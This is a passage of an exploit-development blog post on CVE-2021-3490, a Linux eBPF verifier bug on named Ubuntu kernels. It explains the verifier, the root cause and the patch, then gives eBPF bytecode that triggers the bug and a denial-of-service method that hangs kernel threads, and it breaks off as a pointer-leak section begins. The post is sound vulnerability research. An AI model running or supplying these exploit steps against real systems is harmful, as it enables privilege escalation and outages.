<p style="text-align: center;"><sub><i>Original Date Published: July 29, 2021</i></sub></p> ![[61bb54daa8d73b1a87764a19_kernel-pwning.png]] Find the released local privilege escalation (LPE) Proof-of-Concept for [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490)[here](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490). It targets Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. This blog post is intended to give a detailed overview of eBPF from the perspective of an exploit developer. In this post, I cover: This blog post is intended to give a detailed overview of eBPF from the perspective of an exploit developer. In this post, I cover: - The basics of how eBPF works - The internals of the eBPF verifier - A vulnerability ([CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490)) I exploit for local privilege escalation [ [13]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490). - Debugging eBPF bytecode - Exploitation techniques for DoS, information leak, and LPE - Some interesting observations and other bugs I discovered - New mitigations that make the bug class more difficult to exploit - Weaknesses that are still present in eBPF today I had no knowledge of eBPF going into this. My hope is that by sharing a PoC as well as my experience developing it, it can help others understand eBPF exploitation. ## eBPF: a Primer ### Extended Berkeley Packet Filter: What is it? Berkeley Packet Filter (BPF) was initially created as a way to perform packet filtering in the kernel. Its capabilities were later redesigned and extended to create extended Berkeley Packet Filter (eBPF) [ [1]](https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/). Put simply, eBPF provides a way for a user mode application to run code in the kernel without needing to write a kernel module.The purported benefits of using eBPF versus a kernel module are ease of use, stability, and security. There are also performance improvements gained by doing certain tasks directly in the kernel compared to a pure user mode program. eBPF programs are used to do a myriad of things such as: tracing, instrumentation, hooking system calls, debugging, and of course, packet capturing/filtering. eBPF programs are written in a high level language and compiled into eBPF bytecode using a toolchain (such as [BCC [18]](https://github.com/iovisor/bcc)). The eBPF VM uses a simple instruction set that uses eleven* 64-bit registers, a program counter, and a 512 byte fixed-size stack. Nine registers are general purpose read-write, one is a read-only stack pointer and the program counter is implicit  [ [2]](https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/)_._ The instruction set is similar to x86, and operates on both 64 and 32 bit values. ``` BPF_MOV64_IMM(BPF_REG_0, 0) BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4) BPF_MOV64_REG(BPF_REG_2, BPF_REG_10) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4) BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1) BPF_MOV32_IMM(BPF_REG_3, 0xFFFFFFFF) ``` <p style="text-align: center;"><sub><i>Example of eBPF bytecode instructions</i></sub></p> _*Technically, it uses_ [_12 registers,_](https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65) _but the 12th register is an auxiliary register only used to perform ALU sanitation operations_ [_[12]](https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65) . A user mode application loads the bytecode into the kernel using the [bpf()](https://man7.org/linux/man-pages/man2/bpf.2.html) [ [14]](https://man7.org/linux/man-pages/man2/bpf.2.html) syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical - eBPF exposes a path for unprivileged users to execute in ring0. After the program is loaded, the user mode application attaches the program to a “hook point”. A hook point is a place in the kernel where eBPF programs can be attached [ [5]](https://blog.stackpath.com/bpf-hook-points-part-1/). eBPF programs are event driven, meaning the program will execute when certain events occur at the hook point. The classic use case is attaching an eBPF program to a socket, where the program will execute when data is written to it. If the `kconfig` knob `CONFIG_BPF_JIT`  is set, the eBPF program is JIT compiled into native assembly instructions after it is verified and loaded. Otherwise, when the program is executed it is run in the eBPF interpreter which decodes and executes the eBPF bytecode instructions. User mode applications can interact with and get data from the eBPF program running in the kernel using eBPF maps and eBPF helper functions, which are accessed via the  `bpf()` syscall. ![[61bb5ce172eeb46875b05550_aa91b3_acc28516124a42beb6e77a38f7c6038a_mv2.png]]<p style="text-align: center;"><sub><i>Illustration of a user space application loading and interacting with an eBPF program</i></sub></p> The `sysctl` knob `kernel.unprivileged_bpf_disabled` determines whether unprivileged users are allowed to run eBPF programs. If it is not set, unprivileged users are allowed to attach an eBPF program to a socket that the user owns. In many Linux distributions, such as Ubuntu, `unprivileged_bpf_disabled` is not enabled by default. Because of this, I decided to look into eBPF more closely, as allowing unprivileged users to run code in the kernel is a ripe attack surface. ### eBPF Maps I mentioned above that user mode processes can interact with a eBPF program in the kernel using eBPF maps. They can also be used by multiple eBPF programs to interact with each other. They are a generic key/value store with an arbitrary data structure [ [6]](https://prototype-kernel.readthedocs.io/en/latest/bpf/ebpf_maps.html). There are various types of maps including: arrays, queues, and stacks.   A map is described by five different attributes: - `type` - the data structure of the map - `key_size` - the size in bytes of the key used to index an element (used in array maps) - `value_size` - the size in bytes of each element - `max_entries` - the maximum number of entries in the map - `map_flags` - describes special characteristics of the map, such as if the entire map memory should be preallocated or not eBPF maps can be created and altered from user space via the `bpf()` syscall using the `BPF_MAP_CREATE` command, updated using the `BPF_MAP_UPDATE_ELEM` command, and retrieve its contents using the `BPF_MAP_LOOKUP_ELEM` command. eBPF maps can accessed by eBPF programs using the file descriptor returned by `BPF_MAP_CREATE` and calling eBPF helper functions, which will return pointers to values within the map. ### The eBPF Verifier The exploit I wrote leverages a bug in the eBPF verifier. So before I delve into the vulnerability it is important to briefly explain the internals of the verifier.   The verifier starts by building a control flow graph of the program. Then, it will verify each instruction is valid and all memory accesses are safe through each possible flow of control [ [3]](https://www.spinics.net/lists/xdp-newbies/msg00185.html). Afterwards, it will add in runtime checks to the program. This process, called ALU Sanitation, inserts patches to the eBPF bytecode to ensure permitted memory ranges are not violated during runtime when performing pointer arithmetic [ [4]](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification). The verifier tries to enforce these general set of rules: - No back edges, loops, or unreachable instructions. - No pointer comparisons can be performed, and only scalar values can be added or subtracted to a pointer. A scalar value in the eBPF verifier is any value that is not derived from a pointer. The verifier keeps track of which registers contain pointers and which contain scalar values. - Pointer arithmetic can not leave the “safe” bounds of a map. Meaning, the program can not access anything outside the predefined map memory. To do so, verifier keeps track of the upper and lower bounds of the values for each register. - No pointers can be stored in maps or stored as a return value, in order to avoid leaking kernel addresses to user space. ### Range Tracking The verifier stores the following bound values, for every register in each possible path of execution, to ensure there are no out-of-bound memory accesses: - `umin_value`, `umax_value` store the min/max value of the register when interpreted as an unsigned (64 bit) integer - `smin_value`, `smax_value` store the min/max value of the register when interpreted as a signed (64 bit) integer. - `u32_min_value`, `u32_max_value` store the min/max value of the register when interpreted as an unsigned (32 bit) integer. - `s32_min_value`,`s32_max_value` store the min/max value of the register when interpreted as a signed (32 bit) integer. - `var_off` contains information about the bits of the the register that are known. It is stored in a structure called `tnum` which contains two 64 bit fields: `mask` and `value`. Every bit that is set in mask means the value of that bit is unknown. The unset bits are known, and their true value are stored in `value`. For example, if `var_off = {mask = 0x0; value = 0x1}`, all bits of the register are known, and the register is known to have a value of `1`. If `var_off = {mask = 0xFFFFFFFF00000000; value = 0x3}` it means that the lower 32 bits of the register are known to be `0x00000003` and the upper 32 bits are unknown. These bounds are used to update each other. In particular, if `var_off` indicates the register is a known constant, the min/max bounds are updated to reflect the known value. We will see why this is important later! ### ALU Sanitation ALU Sanitation is a feature that was introduced to supplement the static range tracking of the verifier. The idea is to prevent OOB memory accesses if the value of registers do not fall within their expected range during runtime.  This was added to help mitigate potential vulnerabilities in the verifier and protect against speculative attacks. For every arithmetic operation that involves a pointer and a scalar register, an `alu_limit` is calculated. This represents the maximum absolute value that can be added to or subtracted from the pointer [ [4]](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification). Before each of these operations, the bytecode is patched with the following instructions: ``` *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit); *patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg); *patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg); *patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0); *patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63); *patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg); ``` Note that `off_reg` represents the scalar register being added to the pointer register, and `BPF_REG_AUX` represents the auxiliary register. The above instructions do the following: 1. The value of `alu_limit` is loaded into `BPF_REG_AX`.   2. The value of `off_reg`  at runtime is subtracted from `alu_limit` and stored into `BPF_REG_AX`. If  `off_reg > alu_limit`, the highest bit of `BPF_REG_AX` is set (the sign bit). 3. If the difference stored in `BPF_REG_AUX` is positive and `off_reg` is negative, indicating that `alu_limit` and the register’s value have opposing signs, the `BPF_OR` operation will set the sign bit. 4. The `BPF_NEG` operation will negate the sign bit. If the sign bit is set, it will become 0, and if not, it will become 1. 5. The `BPF_ARSH` operation does an arithmetic right shift of 63 bits. This fills `BPF_REG_AX` with either all 0s or 1s, the value of the sign bit. 6. Depending on the result of the above operation, the `BPF_AND` operation will either null out `off_reg` or leave it unchanged. This means that if `off_reg` exceeds `alu_limit`, or if `off_reg` and `alu_limit` have opposing signs, the value of `off_reg` will be replaced with 0, nulling the pointer arithmetic operation. **alu_limit Computation:** The way `alu_limit` is calculated was [recently updated](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0) [ [15]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0). The new implementation may not have been adopted yet by some Linux distributions. For completeness, I will cover both, and revisit why the differences matter as they become relevant in the next sections. **Previously:** The `alu_limit` is determined by the boundaries of the _pointer_ register. Meaning, if the pointer register points to the beginning of a map, the `alu_limit` for subtraction is 0, and the `alu_limit` for addition is equal to the size of the map (minus 1). The `alu_limit` is updated with subsequent operations on the pointer register. **Now:** The `alu_limit` is determined by the boundaries of the _offset_ register. Meaning if the value of the offset register at runtime is compared against the register’s boundaries computed during the verifier’s static range tracking. _My initial knowledge of the eBPF verifier came from this excellent_ [_blog post_](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification)by Manfred Paul detailing his exploitation of CVE-2020-8835. I highly recommend checking it out! ## The Vulnerability We now have enough background to do a root cause analysis of [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490). Recall that the eBPF instruction set can operate on both the entire 64 bits of registers or just the lower 32 bits. For this reason, the verifier range tracking contains separate bounds for the lower 32 bits of a register: `{u,s}32_{min,max}_value`. These bounds are updated for every operation. Each operation has two tracking functions with a 64 bit and a 32 bit counter part. Both are called for a 64 bit operation in the function [`adjust_scalar_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7479). ``` /* WARNING: This function does calculations on 64-bit values, but the actual * execution may occur on 32-bit values. Therefore, things like bitshifts * need extra checks in the 32-bit case. */ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { ... case BPF_AND: dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off); scalar32_min_max_and(dst_reg, &src;_reg); scalar_min_max_and(dst_reg, &src;_reg); break; case BPF_OR: dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off); scalar32_min_max_or(dst_reg, &src;_reg); scalar_min_max_or(dst_reg, &src;_reg); break; case BPF_XOR: dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off); scalar32_min_max_xor(dst_reg, &src;_reg); scalar_min_max_xor(dst_reg, &src;_reg); break; ... } ``` The bug, [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490), is found in the 32 bit tracking function for `BPF_AND`, `BPF_OR`, and `BPF_XOR` operations. It is the same in each of the functions. Let’s take a look at an excerpt of the [offending code](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7080) for `BPF_AND`: ``` static void scalar32_min_max_and(struct bpf_reg_state *dst_reg, struct bpf_reg_state *src_reg) { bool src_known = tnum_subreg_is_const(src_reg->var_off); bool dst_known = tnum_subreg_is_const(dst_reg->var_off); struct tnum var32_off = tnum_subreg(dst_reg->var_off); s32 smin_val = src_reg->s32_min_value; u32 umax_val = src_reg->u32_max_value; /* Assuming scalar64_min_max_and will be called so its safe * to skip updating register for known 32-bit case. */ if (src_known && dst_known) return; ... } ``` As shown in the code snippet above, if the lower 32 bits of both the source and destination register are known, the function skips updating the 32 bit bounds. The comment above the return states that this is OK, because the [64 bit counterpart](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7116) will take care of it. Let’s take a look: ``` static void scalar_min_max_and(struct bpf_reg_state *dst_reg, struct bpf_reg_state *src_reg) { bool src_known = tnum_is_const(src_reg->var_off); bool dst_known = tnum_is_const(dst_reg->var_off); s64 smin_val = src_reg->smin_value; u64 umin_val = src_reg->umin_value; if (src_known && dst_known) { __mark_reg_known(dst_reg, dst_reg->var_off.value); return; } ... } ``` Indeed, we can see if `src_known` and `dst_known` are true, the function `__mark_reg_known` will be called. Can you spot the problem? In `scalar32_min_max_and`, the _known_ variable is calculated using `tnum_subreg_is_const`. The 64 bit counterpart, `scalar_min_max_and`, uses `tnum_is_const`. The difference is that the former returns true if the the lower 32 bits of the register are known constants, and the latter returns true only if the entire 64 bits are constant. If the operation involves registers where the lower 32 bits are known but the upper 32 bits are unknown, the assumption stated in the comment is violated. In the function `adjust_scalar_min_max_vals`,  before returning, the bounds of the destination register are updated a last time by calling the [following three functions](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7638): ``` __update_reg_bounds(dst_reg); __reg_deduce_bounds(dst_reg); __reg_bound_offset(dst_reg); return 0; ``` Each of these functions have 32 and 64 bit counterparts. I’ll just cover the 32 bit case, since that is what the bug affects. First, the registers bounds are [updated using the current bounds](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1229) and `var_off`. ``` static void __update_reg32_bounds(struct bpf_reg_state *reg) { struct tnum var32_off = tnum_subreg(reg->var_off); /* min signed is max(sign bit) | min(other bits) */ reg->s32_min_value = max_t(s32, reg->s32_min_value, var32_off.value | (var32_off.mask & S32_MIN)); /* max signed is min(sign bit) | max(other bits) */ reg->s32_max_value = min_t(s32, reg->s32_max_value, var32_off.value | (var32_off.mask & S32_MAX)); reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); reg->u32_max_value = min(reg->u32_max_value, (u32)(var32_off.value | var32_off.mask)); } ``` Notice that the min bounds set to either the current min or the known value of register, whichever is larger. Similarly, the max bounds are set either the current max, or the known value of the register, whichever is smaller. Then, the signed and unsigned bounds are used to update each other in  [`__reg32_deduce_bounds`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1264). ``` /* Uses signed min/max values to inform unsigned, and vice-versa */ static void __reg32_deduce_bounds(struct bpf_reg_state *reg) { /* Learn sign from signed bounds. * If we cannot cross the sign boundary, then signed and unsigned bounds * are the same, so combine. This works even in the negative case, e.g. * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff. */ if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) { reg->s32_min_value = reg->u32_min_value = max_t(u32, reg->s32_min_value, reg->u32_min_value); reg->s32_max_value = reg->u32_max_value = min_t(u32, reg->s32_max_value, reg->u32_max_value); return; } ... } ``` Finally, the unsigned bounds are used to update `var_off` in [`__reg_bound_offset`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1339). ``` /* Attempts to improve var_off based on unsigned min/max information */ static void __reg_bound_offset(struct bpf_reg_state *reg) { struct tnum var64_off = tnum_intersect(reg->var_off, tnum_range(reg->umin_value, reg->umax_value)); struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value)); reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off); } ``` Here, - `tnum_range` returns a `tnum` representing the possible values given a range of unsigned integers. - `tnum_intersect` takes two `tnum`s and combines the knowledge conveyed by both into a single `tnum`. Let’s go through the steps using an example so we can understand why this is a critical vulnerability. Suppose we have the instruction `BPF_ALU64_REG(BPF_AND, R2, R3)`. This instruction performs an `AND` operation on registers `R2` and `R3` and saves the results in `R2`. - `R2` has `var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}`, meaning the lower 32 bits are known to have a value of `1`, and the upper 32 bits are unknown. Because the lower 32 bits of the register are known, its 32bit bounds are equal to the value. - `R3` has `var_off = {mask = 0x0; value = 0x100000002}`, meaning the entire 64 bits are known and equal to `0x100000002`. The steps to update the 32 bit bounds of `R2` are as follows: 1. As shown on line 12 of the snippet of `adjust_scalar_min_max_vals`, the function `tnum_and` is called.  This will perform an `AND` operation and save the results in `var_off` of the destination register, `R2`. Recall, the lower 32 bits in both of the registers are known. All of the bits of `R3` are known: the upper 31 bits of are `0`, and the 32nd bit is `1`. This means that  `R2`  is left with  `var_off = {mask = 0x100000000; value = 0x0}`. This is because `2 & 1 = 0` (for the lower 32 bits), and all but the 32nd bit will be known to be 0, since `R3` has a `1` in the 32nd bit. 2. On the next line, `scalar32_min_max_and` is called. We already know that this function will return immediately and make no changes to the bounds, because the lower 32 bits of both registers are known. 3. Then, `__update_reg32_bounds` is called. This will set `u32_max_value = 0`, because the value of `var_off.value = 0 < u32_max_value = 1`. Similarly, it will set `u32_min_value = 1` because `var_off.value = 0 < u32_min_value`. The same goes for the signed bounds. 4. The functions `__reg32_deduce_bounds` and `__reg_bound_offset` will not make any changes to the bounds. Now we can see that in this case, we are left with a register where: `{u,s}32_max_value = 0 < {u,s}32_min_value = 1` Now, let’s look at the patch. ``` @@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg, s32 smin_val = src_reg->s32_min_value; u32 umax_val = src_reg->u32_max_value; - /* Assuming scalar64_min_max_and will be called so its safe - * to skip updating register for known 32-bit case. - */ - if (src_known && dst_known) + if (src_known && dst_known) { + __mark_reg32_known(dst_reg, var32_off.value); return; + } ``` Above we can see that now,`__mark_reg32_known` is called on the destination register before returning if the lower 32 bits of the source and destination register are known constants. Why does this matter? Let’s take a look at what [`__mark_reg32_known`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1093) does: ``` /* Mark the unknown part of a register (variable offset or scalar value) as * known to have the value @imm. */ static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm) { reg->var_off = tnum_const_subreg(reg->var_off, imm); reg->s32_min_value = (s32)imm; reg->s32_max_value = (s32)imm; reg->u32_min_value = (u32)imm; reg->u32_max_value = (u32)imm; } ``` The function above sets all the of the 32 bit boundaries to the value of the register’s lower 32 bits, which are known to be constant. The correct bounds will be conserved when the final boundary updating functions are called, fixing the bug. ## Debugging eBPF Programs Before getting into exploitation, I’ll briefly cover a couple of ways to debug eBPF programs when writing exploits. I specifically say “when writing exploits”, because there are many tools available to help write and debug eBPF programs for legitimate uses, via emulation. One such tool is [rbpf [10]](https://github.com/qmonnet/rbpf), which is a Rust user space virtual machine for eBPF. However, because I exploited a bug in the eBPF verifier, it was important to be able to debug it directly in the kernel to replicate the exact behavior. Additionally, I wrote the bytecode by hand (as opposed to using a toolchain to compile a program into bytecode) so it made using these tools less practical. ### Verifier Log Output When loading an eBPF program, you have the option to specify a log level and a buffer to receive log output from the verifier. ``` char verifier_log_buff[0x200000] = {0}; union bpf_attr prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = cnt, .insns = (uint64_t)insn, .license = (uint64_t)"", .log_level = 2, .log_size = sizeof(verifier_log_buff), .log_buf = verifier_log_buff }; ``` This is useful for debugging  loading failure when the verifier rejects the program. ``` 34: (bf) r6 = r3 35: R0_w=invP0 R2_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R3_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R4_w=invP0 R5_w=invP4294967298 R6_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R7_w=invP(id=0) R10=fp0 fp-8=mmmm???? 35: (7b) *(u64 *)(r2 +8) = r6 R6 leaks addr into map ``` <p style="text-align: center;"><sub><i>Example verifier log output for an eBPF program rejected by the verifier</i></sub></p> Keep in mind that if you choose to provide a log output buffer, it should be large enough to receive the entire output. If it is not large enough, _loading the program will fail. This will occur even if the program is valid and passes the verifier checks_. This can occur if you are loading a long program, as the verifier prints output for every instruction on each path it traverses. I ran into this issue while writing my exploit, so I thought it was worth noting. ### Runtime Debugging Verifier log output provides a lot of useful info, particularly when playing with a verifier vulnerability. Being brand new to eBPF, I wanted to get familiar with the eBPF instruction set. I also wanted to be able to look at the values of registers during program runtime, like in a debugger such as `gdb` or `Windbg`. I found that there isn’t really a straightforward way to do this, but I did find a solution. As previously mentioned, eBPF programs are either JIT compiled after verification and ran natively or decoded and executed within the eBPF interpreter. This depends on the kernel configuration `CONFIG_BPF_JIT`. If JIT is disabled, eBPF bytecode is decoded and executed in `kernel/bpf/core.c`  in the function [`___bpf_prog_run`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/core.c#L13): ``` /** * __bpf_prog_run - run eBPF program on a given context * @regs: is the array of MAX_BPF_EXT_REG eBPF pseudo registers * @insn: is the array of eBPF instructions * * Decode and execute eBPF instructions. */ static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn) { ... select_insn: goto *jumptable[insn->code]; ... } ``` Register values are pointed to by `regs` and the program instructions by `insn`. To get the value of a register during each instruction of the program, you can simply insert a `printk` statement before each instruction is executed. An example is shown below: ``` static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn) { ... int lol = 0; // Check the first instruction to match the first instruction of // the target eBPF program to debug, so output isn't printed for // every eBPF program that is ran. if(insn->code == 0xb7) { lol = 1; } select_insn: if(lol) { printk("instruction is: %0x\n", insn->code); printk("r0: %llx, r1: %llx, r2: %llx\n", regs[0], regs[1], regs[2]); ... } goto *jumptable[insn->code]; ... } ``` You will need to compile the kernel yourself with `CONFIG_BPF_JIT` disabled. For a quick startup on how to compile a kernel yourself and run it with `qemu`, check out [syzkaller’s guide [11]](https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md). This helped me learn the instruction set, and figure out the calling convention for calling eBPF helper functions. It also helped me identify some new mitigations introduced into ALU Sanitation that I will cover later. ## Exploitation ### Triggering the Vulnerability The specifics of the bug were covered in the Vulnerability section. Here, I will go through the bytecode triggers the bug. Remember, we need two registers with `tnum`s in the same state as shown in the example. That is, one register with `var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}` and one with `var_off = {mask = 0x0; value = 0x100000002}`. The latter is easy. Since all the bits are known, we can load the register with the constant value. We will store this value in arbitrary register referred to as `CONST_REG`. Due to the instruction op size, we are restricted to working with 32 bit values. We create the 64 bit value 0x100000002 across a few instructions: ``` // Load 1 into the register BPF_MOV64_IMM(CONST_REG, 0x1) // Left shift 32 bits, the value is now 0x100000000 BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32) // Add 2, the value is now 0x100000002 BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2) ``` Now, for the other register: we need to have the upper 32 bits of `mask` set. We can start with a value that is unknown to the verifier, meaning that all the bits of `mask` are set. The most straightforward way to do this is to load a value from a eBPF map. This way, we can also control the actual value at runtime, which will become useful later. First, we need to retrieve a pointer an eBPF map we create prior to loading the program, which has file descriptor  `store_map_fd`. ``` // Load a pointer to the store_map_fd map into R1. BPF_LD_MAP_FD(BPF_REG_1, store_map_fd) BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG) // Load 0 into R0 BPF_MOV64_IMM(BPF_REG_0, 0) // Store value of R0=0 at stack_ptr-4. BPF_STX_MEM(BPF_W, BPF_STACK_REG, BPF_REG_0, -4) // Set R2= stack_ptr-4 BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4) // Call helper function map_lookup_elem. First parameter is in R1 (map pointer). Second parameter is in // R2, (ptr to elem index value). Effectively: *(word*)(stack_ptr-4) = 0 BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem) ``` Now a pointer to the first element in our map will be returned in register `R0`. From there we can read from it and load a value into an arbitrary register I will refer to as `EXPLOIT_REG`. That will be our second bug-triggering register. ``` // Read 8 bytes from returned map element pointer and store it in EXPLOIT_REG. BPF_LDX_MEM(BPF_DW,EXPLOIT_REG, BPF_REG_R0, 0) ``` Since user space has full control over what is stored in an eBPF map, the verifier will mark this register as having a completely unknown value. That is, `var_off = {mask = 0xFFFFFFFFFFFFFFFF; value = 0x0}`.  Now, we just have to set the lower 32 bits as known with value `1`. ``` // Set R2 to be 0xFFFFFFFF BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFF) // Left shift R2 32 bits, so the value is now 0xFFFFFFFF00000000 BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32) // AND EXPLOIT_REG and R2 and store the results in EXPLOIT_REG. The upper 32 bits will remain unknown, but // the 32 bits are known to be zero BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, BPF_REG_2) // Add 1 to EXPLOIT_REG, it now has mask = 0xFFFFFFFF00000000 and value = 0x1 BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1) ``` Now we trigger the vulnerability by performing an `AND` operation on the two registers we set up. ``` // Trigger the bug, EXPLOIT_REG now has u32_min_value=1,u32_max_value=0 BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG) ``` The actual value we store in the map, and thus the value of `EXPLOIT_REG`, will be set to `0`. We’ll use that later on. ### Denial of Service (DoS) We now have a register `EXPLOIT_REG`, with invalid 32 bit bounds `u32_min_value=1` and `u32_max_value=0`. My first attempt at exploitation wasn’t useful for LPE but it did result in an easy DoS exploit. I learned a bit more about how the verifier patches bytecode in the process. Recall that the verifier checks all possible execution paths. This can be computationally costly, so optimizations are performed to reduce the number of paths it needs to traverse. One is using the bounds of a register to determine the outcome of a conditional statement. For example: ``` BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 5) ``` The above instruction will jump five instructions if the value of the lower 32 bits of `EXPLOIT_REG` is greater than or equal to `1`. For a `JGE` 32 bit conditional, the verifier will attempt to determine if only one branch is taken by checking the `u32_min_value` of the register: ``` static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode) { struct tnum subreg = tnum_subreg(reg->var_off); s32 sval = (s32)val; switch (opcode) { ... case BPF_JGE: if (reg->u32_min_value >= val) return 1; else if (reg->u32_max_value < val) return 0; .. } ``` Notice that  [`is_branch32_taken`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7997)  will return true if `u32_min_value >= 1`. Because `EXPLOIT_REG` has the invalid bound `u32_min_value = 1`, it returns `TRUE`. This means that the verifier believes the `TRUE` branch will always be taken, and will not check the `FALSE` branch. In reality, `EXPLOIT_REG` will have a value of `0` at runtime, so it _will_ take the `FALSE` branch. This means that we can put any instructions we’d like in the `FALSE` branch and the verifier won’t check them for safety! At this point, I thought that I would be able to insert the rest of my exploit into this branch and have free rein. However, the verifier patches all instructions in “dead” branches. ``` /* The verifier does more data flow analysis than llvm and will not * explore branches that are dead at run time. Malicious programs * can have dead code too. Therefore replace all dead at-run-time * code with 'ja -1'. * * Just nops are not optimal, e.g. if they would sit at the end of * the program and through another bug we would manage to jump * there, then we'd execute beyond program memory otherwise. * Returning exception code also wouldn't work since we can have * subprogs where the dead code could be located. */ static void sanitize_dead_code(struct bpf_verifier_env *env) { struct bpf_insn_aux_data *aux_data = env->insn_aux_data; struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1); struct bpf_insn *insn = env->prog->insnsi; const int insn_cnt = env->prog->len; int i; for (i = 0; i < insn_cnt; i++) { if (aux_data[i].seen) continue; memcpy(insn + i, &trap;, sizeof(trap)); } } ``` Above, the function [`sanitize_dead_code`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L11570) , is where this patching occurs. Interestingly, it patches all the dead instructions with a `jmp - 1` instruction. Meaning that once it hits the dead code path, it will go backwards one instruction, execute the conditional statement, then again to the jump back one instruction, in a never ending loop. This leads to the kernel thread idling forever.  You can run a few instances of the exploit, lock up all available kernel threads, and cause a DoS. ### Map Pointer Leak My second instinct was to use the register with invalid boundaries to widen the “safe” range for pointer arithmetic. As previously mentioned, the verifier keeps track of which registers contain pointers and which contain scalars. While I was looking at the code I came across an interesting snippet: ``` /* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off. * Caller should also handle 